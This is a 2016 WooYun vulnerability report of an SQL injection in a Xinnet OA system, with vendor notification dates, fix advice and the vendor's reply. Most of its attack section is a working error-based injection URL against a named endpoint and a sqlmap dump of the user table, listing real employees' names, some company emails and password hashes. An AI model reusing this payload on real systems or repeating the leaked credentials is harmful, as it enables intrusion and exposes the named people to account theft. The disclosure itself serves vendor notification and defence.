当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0197851

漏洞标题:新网互联某系统SQL注入

相关厂商:北京新网互联科技有限公司

漏洞作者: 路人甲

提交时间:2016-04-19 10:00

修复时间:2016-06-05 09:40

公开时间:2016-06-05 09:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-19: 细节已通知厂商并且等待厂商处理中
2016-04-21: 厂商已经确认,细节仅向厂商公开
2016-05-01: 细节向核心白帽子及相关领域专家公开
2016-05-11: 细节向普通白帽子公开
2016-05-21: 细节向实习白帽子公开
2016-06-05: 细节向公众公开

简要描述:

终于凑齐了七颗龙珠 神龙:我可以实现你一个愿望 我:我要一盏阿拉丁神灯 阿拉丁:我可以实现你三个愿望,说吧 我:第一,我要比马云有钱,第二,给我一个神级妹子,第三,我要七颗龙珠 神龙:我可以实现你一个愿望 我:我要一盏阿拉丁神灯……

详细说明:

http://oa.dns.com.cn/interface/ugo.php?OA_USER=aaaaaa%2527%20and%201=(updatexml(1,(concat(0x7c,(select%20user()),0x7c,(select%20database()))),1))%23


错误#1105: XPATH syntax error: '|root@127.0.0.1|td_oa'
SQL语句: SELECT * from USER where USER_ID='aaaaaa' and 1=(updatexml(1,(concat(0x7c,(select user()),0x7c,(select database()))),1))#' or BYNAME='aaaaaa' and 1=(updatexml(1,(concat(0x7c,(select user()),0x7c,(select database()))),1))#'
文件:/interface/ugo.php


sql-shell> select user_id,email,user_name,password from user limit 30
[16:25:57] [INFO] fetching SQL SELECT statement query output: 'select user_id,email,user_name,password from user limit 30'
[16:25:57] [INFO] retrieved: zzzzz
[16:25:57] [INFO] retrieved: $1$Ig2.xy1.$wJlWszTHMHtcUvhCWf.hZ0
[16:25:58] [INFO] retrieved: 艾恒鑫
[16:25:58] [INFO] retrieved: $1$4.5.5P1.$sQ7I/84gzf/A9K.GkXuDB0
[16:25:58] [INFO] retrieved: 艾文山
[16:25:58] [INFO] retrieved: $1$oH0.RE2.$lPJ9QsfjehVBAOJNAQIN.1
[16:25:58] [INFO] retrieved: 安丰博
[16:25:58] [INFO] retrieved: $1$GO..XV5.$DtjM4ZTl82iSwas5TRUdF/
[16:25:58] [INFO] retrieved: 敖丹丹
[16:25:58] [INFO] retrieved: $1$Eq3.7O4.$/Rg8Dh1Mp6sInDwlIEfLx1
[16:25:58] [INFO] retrieved: 白慧丽
[16:25:58] [INFO] retrieved: $1$zs..AA5.$05qoUHy/QtIC17zuaqI9V0
[16:25:58] [INFO] retrieved: 白嗣晔
[16:25:58] [INFO] retrieved: $1$.o..tY1.$SnLUaXL/EO0ppfWPO4Xp70
[16:25:58] [INFO] retrieved: 白添阳
[16:25:58] [INFO] retrieved: $1$Ip0.xH/.$JoIk9tXERoRr01z67Tyh./
[16:25:58] [INFO] retrieved: 白杨
[16:25:58] [INFO] retrieved: $1$Sx0.zw5.$1BBofWPuq88GXqLL04Hqf.
[16:25:58] [INFO] retrieved: 鲍俊林
[16:25:59] [INFO] retrieved: $1$o84.Rv..$YckATjcuf3Q2RcQX6chL0/
[16:25:59] [INFO] retrieved: 鲍俊霖
[16:25:59] [INFO] retrieved: $1$mL1.1F4.$SxZ0dgx1yk2ALgEiiMRBf0
[16:25:59] [INFO] retrieved: 鲍远洋
[16:25:59] [INFO] retrieved: $1$J54.er1.$ScWHoMRpvCzpnHoTkfNQa.
[16:25:59] [INFO] retrieved: 毕波
[16:25:59] [INFO] retrieved: $1$49/.58..$FAwZv12BaVkUr2gGX1adm0
[16:25:59] [INFO] retrieved: 边亚南
[16:25:59] [INFO] retrieved: $1$ak1.b/4.$zVbqoV5JSvCjHmh/oHkcq/
[16:25:59] [INFO] retrieved: 卜凡飞
[16:25:59] [INFO] retrieved: $1$Uj2.Nu1.$RvWglVF1Nwt2RdysY20iC.
[16:25:59] [INFO] retrieved: 蔡国庆
[16:25:59] [INFO] retrieved: $1$2C/.hR1.$6pniafNpxYR6K0VE59sUA0
[16:25:59] [INFO] retrieved: 蔡坤龙
[16:25:59] [INFO] retrieved: $1$lp3.KR4.$qee.dgbVgEH5lnhy.mWyd.
[16:25:59] [INFO] retrieved: 蔡擂
[16:26:00] [INFO] retrieved: $1$Qw2.ZQ4.$eE6ZP8I5/KadKv65kGjpf0
[16:26:00] [INFO] retrieved: 蔡熙
[16:26:00] [INFO] retrieved: $1$u14.fO0.$uYSKz./m1mN/jdGPsnCvE.
[16:26:00] [INFO] retrieved: 曹苍明
[16:26:00] [INFO] retrieved: $1$8o5.vZ5.$m6DAC6.kjHp.92spxGkse.
select user_id,email,user_name,password from user limit 30 [30]:
[*] 123, , 苏涛, $1$0I3.Hs5.$Pq2Sw5RZPMTWjV3fxbg/e/
[*] aba, , 蒋群, $1$iX3.D4/.$QmH2E/LlibJgvJaaNkShA.
[*] abcde, , 郭波, $1$UM5.Nj1.$LUMSssxzOoapaVNyd9aGg.
[*] admin, , 李晖, $1$Mo5.lB2.$0xZzSKqJDFgVSp.SptG2k/
[*] asd, , 马燕达, $1$6s4.Va5.$G0qGl4idG8/O9v4tn7gtP.
[*] sunysh, , 宋农, $1$uL..fS4.$nMKOUKbWVawzToC2.H/9N1
[*] testpwd, , 杨国富, $1$iX2.D42.$lJ..rMcaf6q1E6O7QwvO3.
[*] testpwd1, , 朱尹民, $1$yz1.TB3.$Ew2B7oAC.ihmNY253q7T00
[*] testpwd2, , 柯林, $1$6l..Vf3.$iJzsPo9u3Er.Fhvddpw2d.
[*] zzz, , 赵志勇, $1$Ul/.NI..$mEzQAL1Iwxjdhcrfp39XA/
[*] zzzzz, , 陈琳, $1$Ig2.xy1.$wJlWszTHMHtcUvhCWf.hZ0
[*] 艾恒鑫, , 蓝斌, $1$4.5.5P1.$sQ7I/84gzf/A9K.GkXuDB0
[*] 艾文山, , 雷晓军, $1$oH0.RE2.$lPJ9QsfjehVBAOJNAQIN.1
[*] 安丰博, , 雷有福, $1$GO..XV5.$DtjM4ZTl82iSwas5TRUdF/
[*] 敖丹丹, shizh@dns.com.cn, 任俊, $1$Eq3.7O4.$/Rg8Dh1Mp6sInDwlIEfLx1
[*] 白慧丽, , 孙星, $1$zs..AA5.$05qoUHy/QtIC17zuaqI9V0
[*] 白嗣晔, , 王泽宾, $1$.o..tY1.$SnLUaXL/EO0ppfWPO4Xp70
[*] 白添阳, , 谢志强, $1$Ip0.xH/.$JoIk9tXERoRr01z67Tyh./
[*] 白杨, liufei@dns.com.cn, 杨纯, $1$Sx0.zw5.$1BBofWPuq88GXqLL04Hqf.
[*] 鲍俊林, , 尹寒, $1$o84.Rv..$YckATjcuf3Q2RcQX6chL0/
[*] 鲍俊霖, , 翟峰, $1$mL1.1F4.$SxZ0dgx1yk2ALgEiiMRBf0
[*] 鲍远洋, yinyu@dns.com.cn, 张建, $1$J54.er1.$ScWHoMRpvCzpnHoTkfNQa.
[*] 毕波, , 赵楠, $1$49/.58..$FAwZv12BaVkUr2gGX1adm0
[*] 边亚南, , 朱华, $1$ak1.b/4.$zVbqoV5JSvCjHmh/oHkcq/
[*] 卜凡飞, , 雷晓军1, $1$Uj2.Nu1.$RvWglVF1Nwt2RdysY20iC.
[*] 蔡国庆, , 李立卿, $1$2C/.hR1.$6pniafNpxYR6K0VE59sUA0
[*] 蔡坤龙, , 罗翔, $1$lp3.KR4.$qee.dgbVgEH5lnhy.mWyd.
[*] 蔡擂, , 尚天职, $1$Qw2.ZQ4.$eE6ZP8I5/KadKv65kGjpf0
[*] 蔡熙, , 周立国, $1$u14.fO0.$uYSKz./m1mN/jdGPsnCvE.
[*] 曹苍明, wangchong@dns.com.cn, 陈晨, $1$8o5.vZ5.$m6DAC6.kjHp.92spxGkse.

漏洞证明:

总共700多个账号密码,密码不知道怎么解密...这就很尴尬了....尝试爆破没爆破到弱口令...空气都变得尴尬了..

修复方案:

1.转码后addslashes.
2.目测这个漏洞存在很久了,查下日志吧,看看有没有被入侵。
3.别打程序员;别打运维。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2016-04-21 09:40

厂商回复:

独立的OA系统,没啥有用的数据

最新状态:

暂无